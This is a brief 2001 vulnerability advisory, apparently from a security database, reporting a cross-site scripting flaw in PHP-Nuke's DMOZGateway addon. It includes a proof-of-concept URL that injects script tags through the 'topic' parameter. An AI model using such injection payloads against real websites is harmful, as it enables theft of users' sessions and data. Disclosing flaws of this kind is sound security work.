CSS in DMOZGateway ( php-nuke )

2001-12-17T00:00:00
ID SECURITYVULNS:DOC:2271
Type securityvulns
Reporter Securityvulns
Modified 2001-12-17T00:00:00

Description

New hole in an phpnuke addon. The concerned addon is DMOZGateway. He allows to search on the web via the dmoz.org site. The addon's url is th following one :

/modules.php? op=modload&name=DMOZGateway&file=index

The cross site scripting hole is :

/modules.php? op=modload&name=DMOZGateway&file=index&topic =<script>alert(document.domain) </script><script>alert(/test/)</script>

(without the '*')

frog-m@n